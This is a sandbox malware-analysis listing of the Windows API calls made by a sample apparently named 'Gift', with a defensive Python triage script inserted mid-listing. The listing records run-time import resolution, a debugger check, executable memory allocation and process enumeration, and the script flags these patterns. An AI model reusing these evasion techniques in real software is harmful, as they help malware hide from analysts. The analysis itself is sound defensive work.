                                                                          • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0035827D
                                                                          • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00358284
                                                                          Similarity
                                                                          • API ID: MessageSend$DestroyWindow
                                                                          • String ID: msctls_updown32
                                                                          • API String ID: 4014797782-2298589950
                                                                          • Opcode ID: 2c9743a8064557aefef8dfee0f1f7abea92bba9110d89a1e432c0a9fdb4cd8a7
                                                                          • Instruction ID: fe8b391380479505a36b2a6f3f48694bbee5e672b6340815ba209e8a7b282e74
                                                                          • Opcode Fuzzy Hash: 2c9743a8064557aefef8dfee0f1f7abea92bba9110d89a1e432c0a9fdb4cd8a7
                                                                          • Instruction Fuzzy Hash: 0D21AEB1614208AFDB02DF58CC86DA737EDEB5A394F050459FA01AB2A1CB71EC15CFA0
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00357360
                                                                          • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00357370
                                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00357395
                                                                          Similarity
                                                                          • API ID: MessageSend$MoveWindow
                                                                          • String ID: Listbox
                                                                          • API String ID: 3315199576-2633736733
                                                                          • Opcode ID: 032ac11a6eeacb8571a5933a970c2aa824998678dda397af653ead08f5e4ec4c
                                                                          • Instruction ID: a383924e4ad65f97253d79c063296743f732d14538df94d84ca4cb48aafc2523
                                                                          • Opcode Fuzzy Hash: 032ac11a6eeacb8571a5933a970c2aa824998678dda397af653ead08f5e4ec4c
                                                                          • Instruction Fuzzy Hash: 5D21BE32614118BFDF178F54EC85EBF3BAAEB89761F028124FD449B1A0C671AC559BE0
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00357D97
                                                                          • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00357DAC
                                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00357DB9
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID: msctls_trackbar32
                                                                          • API String ID: 3850602802-1010561917
                                                                          • Opcode ID: 72785e7d95c9cb2f421e6aafbba7f96e439b1687d5e55584f4636bb84db797c2
                                                                          • Instruction ID: d16594684f8ee9520b22a5ddc53a5a210f9c85f265765fbcd4db23a33f682da4
                                                                          • Opcode Fuzzy Hash: 72785e7d95c9cb2f421e6aafbba7f96e439b1687d5e55584f4636bb84db797c2
                                                                          • Instruction Fuzzy Hash: 86110672254248BEDF269F64DC45FEB77ADEF88B14F124119FE45A60E0D672D811CB20
                                                                          APIs
                                                                            • Part of subcall function 0030B544: _memset.LIBCMT ref: 0030B551
                                                                            • Part of subcall function 002F0B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0030B520,?,?,?,002D100A), ref: 002F0B79
                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,002D100A), ref: 0030B524
                                                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,002D100A), ref: 0030B533
                                                                          Strings
                                                                          • =7, xrefs: 0030B514
                                                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0030B52E
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule$=7
                                                                          • API String ID: 3158253471-1276065306
                                                                          • Opcode ID: c20c88dfe4856d3b8d9dcf2d9a9df67dcfc284e1260111badac38d639edbd5f6
                                                                          • Instruction ID: 7004fe5c6f4a385a325a1ae157d96a3db0b68a710486368212b3da24bd42ba85
                                                                          • Opcode Fuzzy Hash: c20c88dfe4856d3b8d9dcf2d9a9df67dcfc284e1260111badac38d639edbd5f6
                                                                          • Instruction Fuzzy Hash: 4BE092702113118FD332AF35E819B42BAE4AF04709F10C95EE496C6781DBB5E504CBA1
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,0031027A,?), ref: 0034C6E7
                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0034C6F9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                          • API String ID: 2574300362-1816364905
                                                                          • Opcode ID: 5faa4e1821dfdb9018250ab936ec18c77d48d217645eefafbb59af5c66ecffce
                                                                          • Instruction ID: 54e06f338bb0cbabdb5477f8cfa7183e1485398ee9e2b69360a7b462daf44d14
                                                                          • Opcode Fuzzy Hash: 5faa4e1821dfdb9018250ab936ec18c77d48d217645eefafbb59af5c66ecffce
                                                                          • Instruction Fuzzy Hash: 74E0C23C5213038FD7235B26CC4AA93BAD8FF04344F40D829E9C5D6250D7B0E8408F10
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,002E4B44,?,002E49D4,?,?,002E27AF,?,00000001), ref: 002E4B85
                                                                          • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 002E4B97
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                          • API String ID: 2574300362-3689287502
                                                                          • Opcode ID: afa557265c4e7cf3962ac4265c2537b680902831dbcacd891a9a15493d908249
                                                                          • Instruction ID: 38a1bbe04fbf282235aad227f052653d84f93e07226078bde7054202efd6dfb5
                                                                          • Opcode Fuzzy Hash: afa557265c4e7cf3962ac4265c2537b680902831dbcacd891a9a15493d908249
                                                                          • Instruction Fuzzy Hash: E2D0C7348203138FDB22AF32DC0AB4776E8AF01340F50CC2ED4C2E2160E7B0E880CA00
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,002E4AF7,?), ref: 002E4BB8
                                                                          • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 002E4BCA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                          • API String ID: 2574300362-1355242751
                                                                          • Opcode ID: 4f48f5e1070d858bdffb22e6d60f8093cbefbce2b894dba3188235ee8a319d62
                                                                          • Instruction ID: 278e9dc8a3a5566cbc83584483c83655e9b97328b6cb757ef63d977c27e73d57
                                                                          • Opcode Fuzzy Hash: 4f48f5e1070d858bdffb22e6d60f8093cbefbce2b894dba3188235ee8a319d62
                                                                          • Instruction Fuzzy Hash: DFD0C7348603138FD322AF32DC0AB4772EAAF02340F10CC6ED4C2D2564EBB0C890CA00
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00351696), ref: 00351455
                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00351467
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: RegDeleteKeyExW$advapi32.dll
                                                                          • API String ID: 2574300362-4033151799
                                                                          • Opcode ID: 4faeab91a6ca89b137186e379369d5917c1b25efc85567cbbc904d3915e0c5db
                                                                          • Instruction ID: 543e9ba012e7b183f32b0ff00b891a19bcde7520f36939d54c8e5c2e850643bd
                                                                          • Opcode Fuzzy Hash: 4faeab91a6ca89b137186e379369d5917c1b25efc85567cbbc904d3915e0c5db
                                                                          • Instruction Fuzzy Hash: 9BD012755207128FD7225F75C849B5776E8AF06396F11DC6AD8D6D2560D6B0D4C0C710
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,002E5E3D), ref: 002E55FE
                                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 002E5610
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                                                          • API String ID: 2574300362-192647395
                                                                          • Opcode ID: 8ee1d385d4f0ea46516357f2090a9e75f5a815b42ae3d1fa3ea4e0e9880ee490
                                                                          • Instruction ID: 2a9da05b0bb28db901725550078a05651118ec91685820f29fbddb3967323ea1
                                                                          • Opcode Fuzzy Hash: 8ee1d385d4f0ea46516357f2090a9e75f5a815b42ae3d1fa3ea4e0e9880ee490
                                                                          • Instruction Fuzzy Hash: FAD012789707238FD7255F31C90A65776D9AF06355F55CC29D4C6D2161D7B0C480C650
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000001,003493DE,?,00360980), ref: 003497D8
                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 003497EA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: GetModuleHandleExW$kernel32.dll
                                                                          • API String ID: 2574300362-199464113
                                                                          • Opcode ID: 1f7ab8d668a4de5c892908fc31d72e16370a3f4547c7e5afa4e846d0f306f7a5
                                                                          • Instruction ID: e4a00c307fb6ef9e7f7d79a54270a7e64471bdda7aabfe442aa768ed2d1c4342
                                                                          • Opcode Fuzzy Hash: 1f7ab8d668a4de5c892908fc31d72e16370a3f4547c7e5afa4e846d0f306f7a5
                                                                          • Instruction Fuzzy Hash: FDD017745207138FD7269F31D88A647BAE8AF05391F16CC2AD4D6E6164EBB0D880CB11
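The records above share a pattern worth pulling out of the raw listing: the first one pairs IsDebuggerPresent with an OutputDebugStringW whose message is the stock ATL CAtlBaseModule constructor error (a low-signal hit on its own), and the next six each call LoadLibraryA followed by GetProcAddress with a symbol name, i.e. imports resolved by name at run time that never appear in the PE import table (GetSystemWow64DirectoryW, both halves of the WOW64 file-system redirection toggle, RegDeleteKeyExW, GetNativeSystemInfo, GetModuleHandleExW). The following triage script is an added example, not part of the Joe Sandbox report or its tooling: it parses the "APIs" / "API ID" lines of these records, pairs each LoadLibraryA module with the GetProcAddress symbol in the same record, and flags records whose API set matches a small behaviour table (debugger check, dynamic import resolution, Toolhelp32 process enumeration as in the CreateToolhelp32Snapshot/Process32FirstW/Process32NextW record further down, COM object creation). The record format it assumes is the one visible on this page; the sample text is constructed from those records with the memory-dump and hash fields dropped; the rule names and function names are mine.

```python
"""Triage Joe Sandbox "IDA Plugin" function records for anti-debug and run-time import resolution."""
import re
from collections import OrderedDict

# Constructed sample: API lines copied from the records on this page, reduced to the
# fields this script parses. The last record on the page has no "API ID" line visible.
SAMPLE = """\
APIs
  • Part of subcall function 0030B544: _memset.LIBCMT ref: 0030B551
  • Part of subcall function 002F0B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0030B520,?,?,?,002D100A), ref: 002F0B79
• IsDebuggerPresent.KERNEL32(?,?,?,002D100A), ref: 0030B524
• OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,002D100A), ref: 0030B533
Strings
• ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0030B52E
Similarity
• API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,0031027A,?), ref: 0034C6E7
• GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0034C6F9
Similarity
• API ID: AddressLibraryLoadProc
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,002E4B44,?,002E49D4,?,?,002E27AF,?,00000001), ref: 002E4B85
• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 002E4B97
Similarity
• API ID: AddressLibraryLoadProc
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,?,002E4AF7,?), ref: 002E4BB8
• GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 002E4BCA
Similarity
• API ID: AddressLibraryLoadProc
APIs
• LoadLibraryA.KERNEL32(advapi32.dll,?,00351696), ref: 00351455
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00351467
Similarity
• API ID: AddressLibraryLoadProc
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 0034F526
• Process32FirstW.KERNEL32(00000000,?), ref: 0034F534
  • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
• Process32NextW.KERNEL32(00000000,?), ref: 0034F5F4
• CloseHandle.KERNEL32(00000000,?,?,?), ref: 0034F603
"""

# One API call line: optional "Part of subcall function X:" prefix, Api.MODULE, optional
# "(args)", then "ref: <call-site address>". Some calls (e.g. CreateToolhelp32Snapshot) have no parens.
CALL_RE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
API_ID_RE = re.compile(r"^\s*•\s*API ID:\s*(?P<id>\S+)\s*$")

# Behaviour table (names are mine): a record matches when every listed API is present.
RULES = OrderedDict([
    ("dynamic import resolution", {"LoadLibraryA", "GetProcAddress"}),
    ("debugger check (IsDebuggerPresent)", {"IsDebuggerPresent"}),
    ("process enumeration via Toolhelp32", {"CreateToolhelp32Snapshot", "Process32FirstW", "Process32NextW"}),
    ("COM object creation (WMI-style query)", {"CoInitialize", "CoCreateInstance"}),
])


def parse_records(text):
    """Split the listing into one record per "APIs" header and parse its call and API ID lines."""
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = {"calls": [], "api_id": None}
            records.append(current)
            continue
        if current is None:
            continue
        m = CALL_RE.match(line)
        if m:
            args = m.group("args")
            current["calls"].append({
                "api": m.group("api"), "module": m.group("mod"),
                "args": args.split(",") if args else [],
                "ref": m.group("ref").upper(), "subcall": m.group("sub") is not None,
            })
            continue
        m = API_ID_RE.match(line)
        if m:
            current["api_id"] = m.group("id")
    return records


def resolved_imports(records):
    """Pair LoadLibraryA(module) with GetProcAddress(_, symbol) inside the same record.
    Records on this page hold one of each; with several, every combination is reported."""
    pairs = set()
    for rec in records:
        libs = [c["args"][0] for c in rec["calls"] if c["api"] == "LoadLibraryA" and c["args"]]
        syms = [c["args"][1] for c in rec["calls"] if c["api"] == "GetProcAddress" and len(c["args"]) > 1]
        pairs.update((lib.lower(), sym) for lib in libs for sym in syms)
    return pairs


def wow64_fs_redirection_toggle(pairs):
    """True when both the disable and revert halves of WOW64 FS redirection are resolved by name."""
    syms = {sym for _, sym in pairs}
    return {"Wow64DisableWow64FsRedirection", "Wow64RevertWow64FsRedirection"} <= syms


def triage(records):
    """Per record: first direct call-site address, API ID, and the behaviour rules fully matched."""
    out = []
    for idx, rec in enumerate(records):
        apis = {c["api"] for c in rec["calls"]}
        direct = [c["ref"] for c in rec["calls"] if not c["subcall"]]
        out.append({"record": idx, "first_ref": direct[0] if direct else None,
                    "api_id": rec["api_id"],
                    "hits": [name for name, needed in RULES.items() if needed <= apis]})
    return out


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for row in triage(recs):
        print(row["record"], row["first_ref"], row["hits"])
    print("run-time imports:", sorted(resolved_imports(recs)))
    print("WOW64 FS redirection toggle present:", wow64_fs_redirection_toggle(resolved_imports(recs)))
```

The point of pairing module and symbol is that a static import-table check of the sample misses these names entirely; the pairs are only visible from the call arguments the sandbox recorded. The IsDebuggerPresent hit should be read with its string: the "Unable to initialize critical section in CAtlBaseModule" message is what ATL's own module constructor emits, so that record is compiler-library code rather than a deliberate anti-debug check, whereas the name-resolved WOW64 and registry functions are the sample's own behaviour.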
                                                                          APIs
                                                                          • CharLowerBuffW.USER32(?,?), ref: 0034E7A7
                                                                          • CharLowerBuffW.USER32(?,?), ref: 0034E7EA
                                                                            • Part of subcall function 0034DE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0034DEAE
                                                                          • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0034E9EA
                                                                          • _memmove.LIBCMT ref: 0034E9FD
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharLower$AllocVirtual_memmove
                                                                          • String ID:
                                                                          • API String ID: 3659485706-0
                                                                          • Opcode ID: 1c85b1c2c567503b115d024d1b61c67849120735f7337a81bb29c0f8c4aed04f
                                                                          • Instruction ID: a56361872e1217e4318492d9c535946ba509a8c37d0df4ce15ed20b06ab4177d
                                                                          • Opcode Fuzzy Hash: 1c85b1c2c567503b115d024d1b61c67849120735f7337a81bb29c0f8c4aed04f
                                                                          • Instruction Fuzzy Hash: 7CC15671A083019FC715DF28C48096ABBE5FF89718F14896EF8999B352D731E946CF82
                                                                          APIs
                                                                          • CoInitialize.OLE32(00000000), ref: 003487AD
                                                                          • CoUninitialize.OLE32 ref: 003487B8
                                                                            • Part of subcall function 0035DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00348A0E,?,00000000), ref: 0035DF71
                                                                          • VariantInit.OLEAUT32(?), ref: 003487C3
                                                                          • VariantClear.OLEAUT32(?), ref: 00348A94
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                          • String ID:
                                                                          • API String ID: 780911581-0
                                                                          • Opcode ID: e18a4fc08abd910eff2a1d26463e2a57aafa0f3e390954001f3a9941d9a8034d
                                                                          • Instruction ID: 10b5e88f40cb262a330cd6c009391923399cc2987b4bcee56eabe675bf99d288
                                                                          • Opcode Fuzzy Hash: e18a4fc08abd910eff2a1d26463e2a57aafa0f3e390954001f3a9941d9a8034d
                                                                          • Instruction Fuzzy Hash: 66A13675214B019FDB11EF14C485A2EB7E5BF88354F14884AF9969B3A2CB70FD44CB92
                                                                          APIs
                                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00363C4C,?), ref: 00328308
                                                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00363C4C,?), ref: 00328320
                                                                          • CLSIDFromProgID.OLE32(?,?,00000000,00360988,000000FF,?,00000000,00000800,00000000,?,00363C4C,?), ref: 00328345
                                                                          • _memcmp.LIBCMT ref: 00328366
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: FromProg$FreeTask_memcmp
                                                                          • String ID:
                                                                          • API String ID: 314563124-0
                                                                          • Opcode ID: c823798e0c7cf85a975d637d9b9e42e67e14a2ce1f4e4e9f5a33b8f341414d41
                                                                          • Instruction ID: 618abf1ab94bf9271a6d7a7477ef0150dcdf5e3f0811572e12e95fb06e2c0fa8
                                                                          • Opcode Fuzzy Hash: c823798e0c7cf85a975d637d9b9e42e67e14a2ce1f4e4e9f5a33b8f341414d41
                                                                          • Instruction Fuzzy Hash: 42815A75A01219EFCB05CFD4C884EEEB7B9FF89315F248558E506AB250DB71AE06CB60
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$AllocClearCopyInitString
                                                                          • String ID:
                                                                          • API String ID: 2808897238-0
                                                                          • Opcode ID: 7881e72ee6ed87b7fd9097af0e6d9a9b75555853759273c9b310274117fe7f70
                                                                          • Instruction ID: 0d1c80d1101a16d56f3a988ab6b0880ef8df000bd016dd1c3df4eebe077bceb4
                                                                          • Opcode Fuzzy Hash: 7881e72ee6ed87b7fd9097af0e6d9a9b75555853759273c9b310274117fe7f70
                                                                          • Instruction Fuzzy Hash: 8A51C9306187229BDB22AF79E895A2DF3E9BF45310F30981FE546CB6A1DF7098408B05
                                                                          APIs
                                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0034F526
                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0034F534
                                                                            • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
                                                                          • Process32NextW.KERNEL32(00000000,?), ref: 0034F5F4
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0034F603
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmp
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
